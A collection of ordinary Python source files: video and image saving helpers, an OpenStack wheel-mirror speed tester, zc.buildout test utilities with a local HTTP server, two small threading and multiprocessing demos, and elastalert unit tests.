logger=None,
)
clip.close()
def create_video_subproc(
frames: List[np.ndarray],
path: str,
filename: str,
extension: str = ".gif",
fps: int = 15,
daemon: bool = True,
):
"""
Create video with a subprocess, since it takes a lot of time for ``moviepy``
to encode the video file.
See Also:
:func:`.create_video`
Note:
if ``daemon`` is true, then this function cannot be used in a
daemonic subprocess.
Args:
frames: A list of numpy arrays of shape (H, W, C) or (H, W), and with
``dtype`` = any float or any int.
When a frame is float type, its value range should be [0, 1].
When a frame is integer type, its value range should be [0, 255].
path: Directory to save the video.
filename: File name.
extension: File extension.
fps: frames per second.
daemon: Whether launching the saving process as a daemonic process.
Returns:
A wait function, once called, block until creation has finished.
"""
def wait():
pass
if frames:
p = get_context("spawn").Process(
target=create_video, args=(frames, path, filename, extension, fps)
)
p.daemon = daemon
p.start()
def wait():
p.join()
return wait
def numpy_array_to_pil_image(image: np.ndarray):
if np.issubdtype(image.dtype, np.integer):
image = image.astype(np.uint8)
elif np.issubdtype(image.dtype, np.floating):
image = (image * 255).astype(np.uint8)
if image.ndim == 2:
# consider as a grey scale image
image = np.repeat(image[:, :, np.newaxis], 3, axis=2)
image = Image.fromarray(image)
return image
def create_image(image: np.ndarray, path: str, filename: str, extension: str = ".png"):
"""
Args:
image: A numpy array of shape (H, W, C) or (H, W), and with
``dtype`` = any float or any int.
When a frame is float type, its value range should be [0, 1].
When a frame is integer type, its value range should be [0, 255].
path: Directory to save the image.
filename: File name.
extension: File extension.
"""
image = numpy_array_to_pil_image(image)
image.save(os.path.join(path, filename + extension))
def create_image_subproc(
image: np.array,
path: str,
filename: str,
extension: str = ".png",
daemon: bool = True,
):
"""
Create image with a subprocess.
See Also:
:func:`.create_image`
Note:
if ``daemon`` is true, then this function cannot be used in a
daemonic subprocess.
Args:
image: A numpy array of shape (H, W, C) or (H, W), and with
``dtype`` = any float or any int.
When a frame is float type, its value range should be [0, 1].
When a frame is integer type, its value range should be [0, 255].
path: Directory to save the image.
filename: File name.
extension: File extension.
daemon: Whether launching the saving process as a daemonic process.
Returns:
A wait function, once called, block until creation has finished.
"""
p = get_context("spawn").Process(
target=create_image, args=(image, path, filename, extension)
)
p.daemon = daemon
p.start()
def wait():
p.join()
return wait
|
fastest-infra-wheel-mirror.py
|
#!/usr/bin/env python
#
# Copyright 2016, Rackspace US, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# (c) 2016, Jesse Pretorius <jesse.pretorius@rackspace.co.uk>
#
# Based on the mirror test script posted at
# http://code.activestate.com/recipes/284631-a-python-script-to-test-download-mirrors/
import platform
import Queue
import re
import threading
import time
import urllib
HTTP_TIMEOUT = 10.0 # Max. seconds to wait for a response
HTTP_TITLE = "Wheel Index" # HTTP Title to look for to validate the page
MAX_THREADS = 10
MIRROR_LIST = ["http://mirror.dfw.rax.openstack.org/wheel/",
"http://mirror.ord.rax.openstack.org/wheel/",
"http://mirror.iad.rax.openstack.org/wheel/",
"http://mirror.gra1.ovh.openstack.org/wheel/",
"http://mirror.bhs1.ovh.openstack.org/wheel/",
"http://mirror.sjc1.bluebox.openstack.org/wheel/",
"http://mirror.nyj01.internap.openstack.org/wheel/",
"http://mirror.cloud1.osic.openstack.org/wheel/"]
def TestUrl(workQueue, resultQueue):
'''Worker thread procedure.
Test how long it takes to return the mirror index page,
then return the results into resultQueue.
'''
def SubthreadProc(url, result):
'''Subthread procedure.
Actually get the mirror index page in a subthread, so that we can time
out using join rather than wait for a very slow server. Passing in a
list for result lets us simulate pass-by-reference, since callers
cannot get the return code from a Python thread.
'''
startTime = time.time()
try:
data = urllib.urlopen(url).read()
except Exception:
# Could be a socket error or an HTTP error--either way, we
# don't care--it's a failure to us.
result.append(-1)
else:
if not CheckTitle(data):
result.append(-1)
else:
elapsed = int((time.time() - startTime) * 1000)
result.append(elapsed)
def CheckTitle(html):
'''Check that the HTML title is the expected value.
Check the HTML returned for the presence of a specified
title. This caters for a situation where a service provider
may be redirecting DNS resolution failures to a web search
page, or where the returned data is invalid in some other
way.
'''
titleRegex = re.compile("<title>(.+?)</title>")
try:
title = titleRegex.search(html).group(1)
except Exception:
# If there is no match, then we consider it a failure.
result.append(-1)
else:
if title == HTTP_TITLE:
return True
else:
return False
while 1:
# Continue pulling data from the work queue until it's empty
try:
url = workQueue.get(0)
except Queue.Empty:
# work queue is empty--exit the thread proc.
return
# Create a single subthread to do the actual work
result = []
subThread = threading.Thread(target=SubthreadProc, args=(url, result))
# Daemonize the subthread so that even if a few are hanging
# around when the process is done, the process will exit.
subThread.setDaemon(True)
# Run the subthread and wait for it to finish, or time out
subThread.start()
subThread.join(HTTP_TIMEOUT)
if [] == result:
# Subthread hasn't give a result yet. Consider it timed out.
resultQueue.put((url, "TIMEOUT"))
elif -1 == result[0]:
# Subthread returned an error from geturl.
resultQueue.put((url, "FAILED"))
else:
# Subthread returned a time. Store it.
resultQueue.put((url, result[0]))
# Set the number of threads to use
numThreads = min(MAX_THREADS, len(MIRROR_LIST))
# Build a queue to feed the worker threads
workQueue = Queue.Queue()
for url in MIRROR_LIST:
# Build the complete URL
distro = platform.linux_distribution()[0].lower()
version = platform.linux_distribution()[1]
architecture = platform.machine()
fullUrl = url + distro + "-" + version + "-" + architecture + "/"
workQueue.put(fullUrl)
workers = []
resultQueue = Queue.Queue()
# Create worker threads to load-balance the retrieval
for threadNum in range(0, numThreads):
workers.append(threading.Thread(target=TestUrl,
args=(workQueue, resultQueue)))
workers[-1].start()
# Wait for all the workers to finish
for w in workers:
w.join()
# Separate the successes from failures
timings = []
failures = []
while not resultQueue.empty():
url, result = resultQueue.get(0)
if isinstance(result, str):
failures.append((result, url))
else:
timings.append((result, url))
# Sort by increasing time or result string
timings.sort()
failures.sort()
# If all results are failed, then exit silently
if len(timings) > 0:
# Print out the fastest mirror URL
print(timings[0][1])
|
testing.py
|
#############################################################################
#
# Copyright (c) 2004-2009 Zope Foundation and Contributors.
# All Rights Reserved.
#
# This software is subject to the provisions of the Zope Public License,
# Version 2.1 (ZPL). A copy of the ZPL should accompany this distribution.
# THIS SOFTWARE IS PROVIDED "AS IS" AND ANY AND ALL EXPRESS OR IMPLIED
# WARRANTIES ARE DISCLAIMED, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF TITLE, MERCHANTABILITY, AGAINST INFRINGEMENT, AND FITNESS
# FOR A PARTICULAR PURPOSE.
#
##############################################################################
"""Various test-support utility functions
"""
try:
# Python 3
from http.server import HTTPServer, BaseHTTPRequestHandler
from urllib.request import urlopen
except ImportError:
# Python 2
from BaseHTTPServer import HTTPServer, BaseHTTPRequestHandler
from urllib2 import urlopen
import errno
import logging
from multiprocessing import Process
import os
import pkg_resources
import random
import re
import shutil
import socket
import subprocess
import sys
import tempfile
import threading
import time
import zc.buildout.buildout
import zc.buildout.easy_install
from zc.buildout.rmtree import rmtree
print_ = zc.buildout.buildout.print_
fsync = getattr(os, 'fsync', lambda fileno: None)
is_win32 = sys.platform == 'win32'
def read(path='out', *rest):
with open(os.path.join(path, *rest)) as f:
return f.read()
def cat(dir, *names):
path = os.path.join(dir, *names)
if (not os.path.exists(path)
and is_win32
and os.path.exists(path+'-script.py')
):
path = path+'-script.py'
with open(path) as f:
print_(f.read(), end='')
def eqs(a, *b):
a = set(a); b = set(b)
return None if a == b else (a - b, b - a)
def clear_here():
for name in os.listdir('.'):
if os.path.isfile(name) or os.path.islink(name):
os.remove(name)
else:
shutil.rmtree(name)
def ls(dir, *subs):
if subs:
dir = os.path.join(dir, *subs)
names = sorted(os.listdir(dir))
for name in names:
# If we're running under coverage, elide coverage files
if os.getenv("COVERAGE_PROCESS_START") and name.startswith('.coverage.'):
continue
if os.path.isdir(os.path.join(dir, name)):
print_('d ', end=' ')
elif os.path.islink(os.path.join(dir, name)):
print_('l ', end=' ')
else:
print_('- ', end=' ')
print_(name)
def mkdir(*path):
os.mkdir(os.path.join(*path))
def remove(*path):
path = os.path.join(*path)
if os.path.isdir(path):
shutil.rmtree(path)
else:
os.remove(path)
def rmdir(*path):
shutil.rmtree(os.path.join(*path))
def write(dir, *args):
path = os.path.join(dir, *(args[:-1]))
f = open(path, 'w')
f.write(args[-1])
f.flush()
fsync(f.fileno())
f.close()
def clean_up_pyc(*path):
base, filename = os.path.join(*path[:-1]), path[-1]
if filename.endswith('.py'):
filename += 'c' # .py -> .pyc
for path in (
os.path.join(base, filename),
os.path.join(base, '__pycache__'),
):
if os.path.isdir(path):
rmdir(path)
elif os.path.exists(path):
remove(path)
## FIXME - check for other platforms
MUST_CLOSE_FDS = not sys.platform.startswith('win')
def system(command, input='', with_exit_code=False):
# Some TERMinals, expecially xterm and its variants, add invisible control
# characters, which we do not want as they mess up doctests. See:
# https://github.com/buildout/buildout/pull/311
# http://bugs.python.org/issue19884
env = dict(os.environ, TERM='dumb')
p = subprocess.Popen(command,
shell=True,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
close_fds=MUST_CLOSE_FDS,
env=env)
i, o, e = (p.stdin, p.stdout, p.stderr)
if input:
i.write(input.encode())
i.close()
result = o.read() + e.read()
o.close()
e.close()
output = result.decode()
if with_exit_code:
# Use the with_exit_code=True parameter when you want to test the exit
# code of the command you're running.
output += 'EXIT CODE: %s' % p.wait()
p.wait()
return output
def get(url):
return str(urlopen(url).read().decode())
def _runsetup(setup, *args):
if os.path.isdir(setup):
setup = os.path.join(setup, 'setup.py')
args = list(args)
args.insert(0, '-q')
here = os.getcwd()
try:
os.chdir(os.path.dirname(setup))
zc.buildout.easy_install.call_subprocess(
[sys.executable, setup] + args,
env=dict(os.environ,
PYTHONPATH=zc.buildout.easy_install.setuptools_pythonpath,
),
)
if os.path.exists('build'):
rmtree('build')
finally:
os.chdir(here)
def sdist(setup, dest):
_runsetup(setup, 'sdist', '-d', dest, '--formats=zip')
def bdist_egg(setup, executable, dest=None):
# Backward compat:
if dest is None:
dest = executable
else:
assert executable == sys.executable, (executable, sys.executable)
_runsetup(setup, 'bdist_egg', '-d', dest)
def wait_until(label, func, *args, **kw):
if 'timeout' in kw:
kw = dict(kw)
timeout = kw.pop('timeout')
else:
timeout = 30
deadline = time.time()+timeout
while time.time() < deadline:
if func(*args, **kw):
return
time.sleep(0.01)
raise ValueError('Timed out waiting for: '+label)
class TestOptions(zc.buildout.buildout.Options):
def __init__(self, *args):
zc.buildout.buildout.Options.__init__(self, *args)
self._created = []
def initialize(self):
pass
class Buildout(zc.buildout.buildout.Buildout):
def __init__(self):
for name in 'eggs', 'parts':
if not os.path.exists(name):
os.mkdir(name)
zc.buildout.buildout.Buildout.__init__(
self, '', [('buildout', 'directory', os.getcwd())], False)
Options = TestOptions
def buildoutSetUp(test):
test.globs['__tear_downs'] = __tear_downs = []
test.globs['register_teardown'] = register_teardown = __tear_downs.append
prefer_final = zc.buildout.easy_install.prefer_final()
register_teardown(
lambda: zc.buildout.easy_install.prefer_final(prefer_final)
)
here = os.getcwd()
register_teardown(lambda: os.chdir(here))
handlers_before_set_up = logging.getLogger().handlers[:]
def restore_root_logger_handlers():
root_logger = logging.getLogger()
for handler in root_logger.handlers[:]:
root_logger.removeHandler(handler)
for handler in handlers_before_set_up:
root_logger.addHandler(handler)
bo_logger = logging.getLogger('zc.buildout')
for handler in bo_logger.handlers[:]:
bo_logger.removeHandler(handler)
register_teardown(restore_root_logger_handlers)
base = tempfile.mkdtemp('buildoutSetUp')
base = os.path.realpath(base)
register_teardown(lambda base=base: rmtree(base))
old_home = os.environ.get('HOME')
os.environ['HOME'] = os.path.join(base, 'bbbBadHome')
def restore_home():
if old_home is None:
del os.environ['HOME']
else:
os.environ['HOME'] = old_home
register_teardown(restore_home)
base = os.path.join(base, '_TEST_')
os.mkdir(base)
tmp = tempfile.mkdtemp('buildouttests')
register_teardown(lambda: rmtree(tmp))
zc.buildout.easy_install.default_index_url = 'file://'+tmp
os.environ['buildout-testing-index-url'] = (
zc.buildout.easy_install.default_index_url)
def tmpdir(name):
path = os.path.join(base, name)
mkdir(path)
return path
sample = tmpdir('sample-buildout')
os.chdir(sample)
# Create a basic buildout.cfg to avoid a warning from buildout:
with open('buildout.cfg', 'w') as f:
f.write("[buildout]\nparts =\n")
# Use the buildout bootstrap command to create a buildout
zc.buildout.buildout.Buildout(
'buildout.cfg',
[('buildout', 'log-level', 'WARNING'),
# trick bootstrap into putting the buildout develop egg
# in the eggs dir.
('buildout', 'develop-eggs-directory', 'eggs'),
]
).bootstrap([])
# Create the develop-eggs dir, which didn't get created the usual
# way due to the trick above:
os.mkdir('develop-eggs')
if os.getenv("COVERAGE_PROCESS_START"):
# The user has requested subprocess code coverage. Since we will be changing
# directories, we need to make sure this path is absolute, which means
# we need to temporarily return to our starting directory.
os.chdir(here)
path_to_coveragerc = os.path.abspath(os.environ['COVERAGE_PROCESS_START'])
os.chdir(sample)
assert os.path.isfile(path_to_coveragerc), path_to_coveragerc
os.environ['COVERAGE_PROCESS_START'] = path_to_coveragerc
# Before we return to the current directory and destroy the
# temporary working directory, we need to copy all the coverage files
# back so that they can be `coverage combine`d.
def copy_coverage_files():
coveragedir = os.path.dirname(path_to_coveragerc)
import glob
for f in glob.glob('.coverage*'):
shutil.copy(f, coveragedir)
__tear_downs.insert(0, copy_coverage_files)
# Now we must modify the newly created bin/buildout to
# actually begin coverage.
with open('bin/buildout') as f:
import textwrap
lines = f.read().splitlines()
assert lines[1] == '', lines
lines[1] = 'import coverage; coverage.process_startup()'
with open('bin/buildout', 'w') as f:
f.write('\n'.join(lines))
def start_server(path):
port, thread = _start_server(path, name=path)
url = 'http://localhost:%s/' % port
register_teardown(lambda: stop_server(url, thread))
return url
cdpaths = []
def cd(*path):
path = os.path.join(*path)
cdpaths.append(os.path.abspath(os.getcwd()))
os.chdir(path)
def uncd():
os.chdir(cdpaths.pop())
test.globs.update(dict(
sample_buildout = sample,
ls = ls,
cat = cat,
mkdir = mkdir,
rmdir = rmdir,
remove = remove,
tmpdir = tmpdir,
write = write,
system = system,
get = get,
cd = cd, uncd = uncd,
join = os.path.join,
sdist = sdist,
bdist_egg = bdist_egg,
start_server = start_server,
stop_server = stop_server,
buildout = os.path.join(sample, 'bin', 'buildout'),
wait_until = wait_until,
print_ = print_,
clean_up_pyc = clean_up_pyc,
))
zc.buildout.easy_install.prefer_final(prefer_final)
def buildoutTearDown(test):
for f in test.globs['__tear_downs']:
f()
class Server(HTTPServer):
def __init__(self, tree, *args):
HTTPServer.__init__(self, *args)
self.tree = os.path.abspath(tree)
__run = True
def serve_forever(self):
while self.__run:
self.handle_request()
def handle_error(self, *_):
self.__run = False
class Handler(BaseHTTPRequestHandler):
Server.__log = False
def __init__(self, request, address, server):
self.__server = server
self.tree = server.tree
BaseHTTPRequestHandler.__init__(self, request, address, server)
def do_GET(self):
if '__stop__' in self.path:
self.__server.server_close()
raise SystemExit
def k():
self.send_response(200)
out = '<html><body>k</body></html>\n'.encode()
self.send_header('Content-Length', str(len(out)))
self.send_header('Content-Type', 'text/html')
self.end_headers()
self.wfile.write(out)
if self.path == '/enable_server_logging':
self.__server.__log = True
return k()
if self.path == '/disable_server_logging':
self.__server.__log = False
return k()
path = os.path.abspath(os.path.join(self.tree, *self.path.split('/')))
if not (
((path == self.tree) or path.startswith(self.tree+os.path.sep))
and
os.path.exists(path)
):
self.send_response(404, 'Not Found')
#self.send_response(200)
out = '<html><body>Not Found</body></html>'.encode()
#out = '\n'.join(self.tree, self.path, path)
self.send_header('Content-Length', str(len(out)))
self.send_header('Content-Type', 'text/html')
self.end_headers()
self.wfile.write(out)
return
self.send_response(200)
if os.path.isdir(path):
out = ['<html><body>\n']
names = sorted(os.listdir(path))
for name in names:
if os.path.isdir(os.path.join(path, name)):
name += '/'
out.append('<a href="%s">%s</a><br>\n' % (name, name))
out.append('</body></html>\n')
out = ''.join(out).encode()
self.send_header('Content-Length', str(len(out)))
self.send_header('Content-Type', 'text/html')
else:
with open(path, 'rb') as f:
out = f.read()
self.send_header('Content-Length', len(out))
if path.endswith('.egg'):
self.send_header('Content-Type', 'application/zip')
elif path.endswith('.gz'):
self.send_header('Content-Type', 'application/x-gzip')
elif path.endswith('.zip'):
self.send_header('Content-Type', 'application/x-gzip')
else:
self.send_header('Content-Type', 'text/html')
self.end_headers()
self.wfile.write(out)
def log_request(self, code):
if self.__server.__log:
print_('%s %s %s' % (self.command, code, self.path))
def _run(tree, port):
server_address = ('localhost', port)
httpd = Server(tree, server_address, Handler)
httpd.serve_forever()
httpd.server_close()
def get_port():
for i in range(10):
port = random.randrange(20000, 30000)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
try:
s.connect(('localhost', port))
except socket.error:
return port
finally:
s.close()
raise RuntimeError("Can't find port")
def _start_server(tree, name=''):
port = get_port()
thread = threading.Thread(target=_run, args=(tree, port), name=name)
thread.setDaemon(True)
thread.start()
wait(port, up=True)
return port, thread
def start_server(tree):
return _start_server(tree)[0]
def stop_server(url, thread=None):
try:
urlopen(url+'__stop__')
except Exception:
pass
if thread is not None:
thread.join() # wait for thread to stop
def wait(port, up):
addr = 'localhost', port
for i in range(120):
time.sleep(0.25)
try:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(addr)
s.close()
if up:
break
except socket.error:
e = sys.exc_info()[1]
if e[0] not in (errno.ECONNREFUSED, errno.ECONNRESET):
raise
s.close()
if not up:
break
else:
if up:
raise
else:
raise SystemError("Couldn't stop server")
def install(project, destination):
if not isinstance(destination, str):
destination = os.path.join(destination.globs['sample_buildout'],
'eggs')
dist = pkg_resources.working_set.find(
pkg_resources.Requirement.parse(project))
if dist.location.endswith('.egg'):
destination = os.path.join(destination,
os.path.basename(dist.location),
)
if os.path.isdir(dist.location):
shutil.copytree(dist.location, destination)
else:
shutil.copyfile(dist.location, destination)
else:
# copy link
with open(os.path.join(destination, project+'.egg-link'), 'w') as f:
f.write(dist.location)
def install_develop(project, destination):
if not isinstance(destination, str):
destination = os.path.join(destination.globs['sample_buildout'],
'develop-eggs')
dist = pkg_resources.working_set.find(
pkg_resources.Requirement.parse(project))
with open(os.path.join(destination, project+'.egg-link'), 'w') as f:
f.write(dist.location)
def _normalize_path(match):
path = match.group(1)
if os.path.sep == '\\':
path = path.replace('\\\\', '/')
if path.startswith('\\'):
path = path[1:]
return '/' + path.replace(os.path.sep, '/')
normalize_path = (
re.compile(
r'''[^'" \t\n\r]+\%(sep)s_[Tt][Ee][Ss][Tt]_\%(sep)s([^"' \t\n\r]+)'''
% dict(sep=os.path.sep)),
_normalize_path,
)
normalize_endings = re.compile('\r\n'), '\n'
normalize_script = (
re.compile('(\n?)- ([a-zA-Z_.-]+)-script.py\n- \\2.exe\n'),
'\\1- \\2\n')
if sys.version_info > (2, ):
normalize___pycache__ = (
re.compile('(\n?)d __pycache__\n'), '\\1')
else:
normalize___pycache__ = (
re.compile(r'(\n?)- \S+\.pyc\n'), '\\1')
normalize_egg_py = (
re.compile(r'-py\d[.]\d(-\S+)?.egg'),
'-pyN.N.egg',
)
normalize_exception_type_for_python_2_and_3 = (
re.compile(r'^(\w+\.)*([A-Z][A-Za-z0-9]+Error: )'),
'\2')
normalize_open_in_generated_script = (
re.compile(r"open\(__file__, 'U'\)"), 'open(__file__)')
not_found = (re.compile(r'Not found: [^\n]+/(\w|\.)+/\r?\n'), '')
# Setuptools now pulls in dependencies when installed.
adding_find_link = (re.compile(r"Adding find link '[^']+'"
r" from setuptools .*\r?\n"), '')
ignore_not_upgrading = (
re.compile(
'Not upgrading because not running a local buildout command.\n'
), '')
def run_buildout(command):
# Make sure we don't get .buildout
os.environ['HOME'] = os.path.join(os.getcwd(), 'home')
args = command.split()
import pkg_resources
buildout = pkg_resources.load_entry_point(
'zc.buildout', 'console_scripts', args[0])
buildout(args[1:])
def run_from_process(target, *args, **kw):
sys.stdout = sys.stderr = open('out', 'w')
target(*args, **kw)
def run_in_process(*args, **kwargs):
process = Process(target=run_from_process, args=args, kwargs=kwargs)
process.daemon = True
process.start()
process.join(99)
if process.is_alive() or process.exitcode:
with open('out') as f:
print(f.read())
def run_buildout_in_process(command='buildout'):
command = command.split(' ', 1)
command.insert(
1,
" use-dependency-links=false"
# Leaving this here so we can uncomment to see what's going on.
#" log-format=%(asctime)s____%(levelname)s_%(message)s -vvv"
" index=" + __file__ + 'nonexistent' # hide index
)
command = ' '.join(command)
run_in_process(run_buildout, command)
|
daemon_thread_with_join.py
|
import logging
import threading
import time
def thread_function(name):
logging.info(f'Thread {name}: starting')
time.sleep(2)
logging.info(f'Thread {name}: finishing')
if __name__ == "__main__":
format = "%(asctime)s: %(message)s"
logging.basicConfig(format=format, level=logging.INFO, datefmt='%H:%M:%S')
logging.info('Main : before creating thread')
# 인자로 튜플 형태의 데이터(1, ) 전달
x = threading.Thread(target=thread_function, args=(1, ), daemon=True)
logging.info('Main : before running thread')
x.start()
logging.info('Main : wait for the thread to finish')
x.join()
logging.info('Main : all done')
|
01_demo.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from multiprocessing import Process
import time
import os
def run_proc(name, age, **kwargs):
"""⼦进程要执⾏的代码"""
for i in range(10):
print('⼦进程运⾏中, name= %s,age=%d ,pid=%d...' % (name, age, os.getpid()))
print(kwargs)
time.sleep(0.2)
print('⼦进程将要结束...')
if __name__ == "__main__":
print('⽗进程pid: %d' % os.getpid()) # os.getpid获取当前进程的进程号
p = Process(target=run_proc, args=("test", 18), kwargs={"m":20})
p.start()
time.sleep(1)
p.terminate()
|
base_test.py
|
# -*- coding: utf-8 -*-
import contextlib
import copy
import datetime
import json
import threading
import elasticsearch
import mock
import pytest
from elasticsearch.exceptions import ConnectionError
from elasticsearch.exceptions import ElasticsearchException
from elastalert.enhancements import BaseEnhancement
from elastalert.enhancements import DropMatchException
from elastalert.kibana import dashboard_temp
from elastalert.util import dt_to_ts
from elastalert.util import dt_to_unix
from elastalert.util import dt_to_unixms
from elastalert.util import EAException
from elastalert.util import ts_now
from elastalert.util import ts_to_dt
from elastalert.util import unix_to_dt
START_TIMESTAMP = '2014-09-26T12:34:45Z'
END_TIMESTAMP = '2014-09-27T12:34:45Z'
START = ts_to_dt(START_TIMESTAMP)
END = ts_to_dt(END_TIMESTAMP)
def _set_hits(ea_inst, hits):
res = {'hits': {'total': len(hits), 'hits': hits}}
ea_inst.client_es.return_value = res
def generate_hits(timestamps, **kwargs):
hits = []
for i, ts in enumerate(timestamps):
data = {'_id': 'id{}'.format(i),
'_source': {'@timestamp': ts},
'_type': 'logs',
'_index': 'idx'}
for key, item in kwargs.items():
data['_source'][key] = item
# emulate process_hits(), add metadata to _source
for field in ['_id', '_type', '_index']:
data['_source'][field] = data[field]
hits.append(data)
return {'hits': {'total': len(hits), 'hits': hits}}
def assert_alerts(ea_inst, calls):
""" Takes a list of lists of timestamps. Asserts that an alert was called for each list, containing those timestamps. """
assert ea_inst.rules[0]['alert'][0].alert.call_count == len(calls)
for call_num, call_args in enumerate(ea_inst.rules[0]['alert'][0].alert.call_args_list):
assert not any([match['@timestamp'] not in calls[call_num] for match in call_args[0][0]])
assert len(call_args[0][0]) == len(calls[call_num])
def test_starttime(ea):
invalid = ['2014-13-13',
'2014-11-24T30:00:00',
'Not A Timestamp']
for ts in invalid:
with pytest.raises((TypeError, ValueError)):
ts_to_dt(ts)
def test_init_rule(ea):
# Simulate state of a rule just loaded from a file
ea.rules[0]['minimum_starttime'] = datetime.datetime.now()
new_rule = copy.copy(ea.rules[0])
map(new_rule.pop, ['agg_matches', 'current_aggregate_id', 'processed_hits', 'minimum_starttime'])
# Properties are copied from ea.rules[0]
ea.rules[0]['starttime'] = '2014-01-02T00:11:22'
ea.rules[0]['processed_hits'] = ['abcdefg']
new_rule = ea.init_rule(new_rule, False)
for prop in ['starttime', 'agg_matches', 'current_aggregate_id', 'processed_hits', 'minimum_starttime']:
assert new_rule[prop] == ea.rules[0][prop]
# Properties are fresh
new_rule = ea.init_rule(new_rule, True)
new_rule.pop('starttime')
assert 'starttime' not in new_rule
assert new_rule['processed_hits'] == {}
def test_query(ea):
ea.current_es.search.return_value = {'hits': {'total': 0, 'hits': []}}
ea.run_query(ea.rules[0], START, END)
ea.current_es.search.assert_called_with(body={
'query': {'filtered': {'filter': {'bool': {'must': [{'range': {'@timestamp': {'lte': END_TIMESTAMP, 'gt': START_TIMESTAMP}}}]}}}},
'sort': [{'@timestamp': {'order': 'asc'}}]}, index='idx', _source_include=['@timestamp'], ignore_unavailable=True,
size=ea.rules[0]['max_query_size'], scroll=ea.conf['scroll_keepalive'])
def test_query_with_fields(ea):
ea.rules[0]['_source_enabled'] = False
ea.current_es.search.return_value = {'hits': {'total': 0, 'hits': []}}
ea.run_query(ea.rules[0], START, END)
ea.current_es.search.assert_called_with(body={
'query': {'filtered': {'filter': {'bool': {'must': [{'range': {'@timestamp': {'lte': END_TIMESTAMP, 'gt': START_TIMESTAMP}}}]}}}},
'sort': [{'@timestamp': {'order': 'asc'}}], 'fields': ['@timestamp']}, index='idx', ignore_unavailable=True,
size=ea.rules[0]['max_query_size'], scroll=ea.conf['scroll_keepalive'])
def test_query_with_unix(ea):
ea.rules[0]['timestamp_type'] = 'unix'
ea.rules[0]['dt_to_ts'] = dt_to_unix
ea.current_es.search.return_value = {'hits': {'total': 0, 'hits': []}}
ea.run_query(ea.rules[0], START, END)
start_unix = dt_to_unix(START)
end_unix = dt_to_unix(END)
ea.current_es.search.assert_called_with(
body={'query': {'filtered': {'filter': {'bool': {'must': [{'range': {'@timestamp': {'lte': end_unix, 'gt': start_unix}}}]}}}},
'sort': [{'@timestamp': {'order': 'asc'}}]}, index='idx', _source_include=['@timestamp'], ignore_unavailable=True,
size=ea.rules[0]['max_query_size'], scroll=ea.conf['scroll_keepalive'])
def test_query_with_unixms(ea):
ea.rules[0]['timestamp_type'] = 'unixms'
ea.rules[0]['dt_to_ts'] = dt_to_unixms
ea.current_es.search.return_value = {'hits': {'total': 0, 'hits': []}}
ea.run_query(ea.rules[0], START, END)
start_unix = dt_to_unixms(START)
end_unix = dt_to_unixms(END)
ea.current_es.search.assert_called_with(
body={'query': {'filtered': {'filter': {'bool': {'must': [{'range': {'@timestamp': {'lte': end_unix, 'gt': start_unix}}}]}}}},
'sort': [{'@timestamp': {'order': 'asc'}}]}, index='idx', _source_include=['@timestamp'], ignore_unavailable=True,
size=ea.rules[0]['max_query_size'], scroll=ea.conf['scroll_keepalive'])
def test_no_hits(ea):
ea.current_es.search.return_value = {'hits': {'total': 0, 'hits': []}}
ea.run_query(ea.rules[0], START, END)
assert ea.rules[0]['type'].add_data.call_count == 0
def test_no_terms_hits(ea):
ea.rules[0]['use_terms_query'] = True
ea.rules[0]['query_key'] = 'QWERTY'
ea.rules[0]['doc_type'] = 'uiop'
ea.current_es.search.return_value = {'hits': {'total': 0, 'hits': []}}
ea.run_query(ea.rules[0], START, END)
assert ea.rules[0]['type'].add_terms_data.call_count == 0
def test_some_hits(ea):
hits = generate_hits([START_TIMESTAMP, END_TIMESTAMP])
hits_dt = generate_hits([START, END])
ea.current_es.search.return_value = hits
ea.run_query(ea.rules[0], START, END)
assert ea.rules[0]['type'].add_data.call_count == 1
ea.rules[0]['type'].add_data.assert_called_with([x['_source'] for x in hits_dt['hits']['hits']])
def test_some_hits_unix(ea):
ea.rules[0]['timestamp_type'] = 'unix'
ea.rules[0]['dt_to_ts'] = dt_to_unix
ea.rules[0]['ts_to_dt'] = unix_to_dt
hits = generate_hits([dt_to_unix(START), dt_to_unix(END)])
hits_dt = generate_hits([START, END])
ea.current_es.search.return_value = copy.deepcopy(hits)
ea.run_query(ea.rules[0], START, END)
assert ea.rules[0]['type'].add_data.call_count == 1
ea.rules[0]['type'].add_data.assert_called_with([x['_source'] for x in hits_dt['hits']['hits']])
def _duplicate_hits_generator(timestamps, **kwargs):
"""Generator repeatedly returns identical hits dictionaries
"""
while True:
yield generate_hits(timestamps, **kwargs)
def test_duplicate_timestamps(ea):
ea.current_es.search.side_effect = _duplicate_hits_generator([START_TIMESTAMP] * 3, blah='duplicate')
ea.run_query(ea.rules[0], START, ts_to_dt('2014-01-01T00:00:00Z'))
assert len(ea.rules[0]['type'].add_data.call_args_list[0][0][0]) == 3
assert ea.rules[0]['type'].add_data.call_count == 1
# Run the query again, duplicates will be removed and not added
ea.run_query(ea.rules[0], ts_to_dt('2014-01-01T00:00:00Z'), END)
assert ea.rules[0]['type'].add_data.call_count == 1
def test_match(ea):
hits = generate_hits([START_TIMESTAMP, END_TIMESTAMP])
ea.current_es.search.return_value = hits
ea.rules[0]['type'].matches = [{'@timestamp': END}]
with mock.patch('elastalert.elastalert.elasticsearch_client'):
ea.run_rule(ea.rules[0], END, START)
ea.rules[0]['alert'][0].alert.called_with({'@timestamp': END_TIMESTAMP})
assert ea.rules[0]['alert'][0].alert.call_count == 1
def test_run_rule_calls_garbage_collect(ea):
start_time = '2014-09-26T00:00:00Z'
end_time = '2014-09-26T12:00:00Z'
ea.buffer_time = datetime.timedelta(hours=1)
ea.run_every = datetime.timedelta(hours=1)
with contextlib.nested(mock.patch.object(ea.rules[0]['type'], 'garbage_collect'),
mock.patch.object(ea, 'run_query')) as (mock_gc, mock_get_hits):
ea.run_rule(ea.rules[0], ts_to_dt(end_time), ts_to_dt(start_time))
# Running ElastAlert every hour for 12 hours, we should see self.garbage_collect called 12 times.
assert mock_gc.call_count == 12
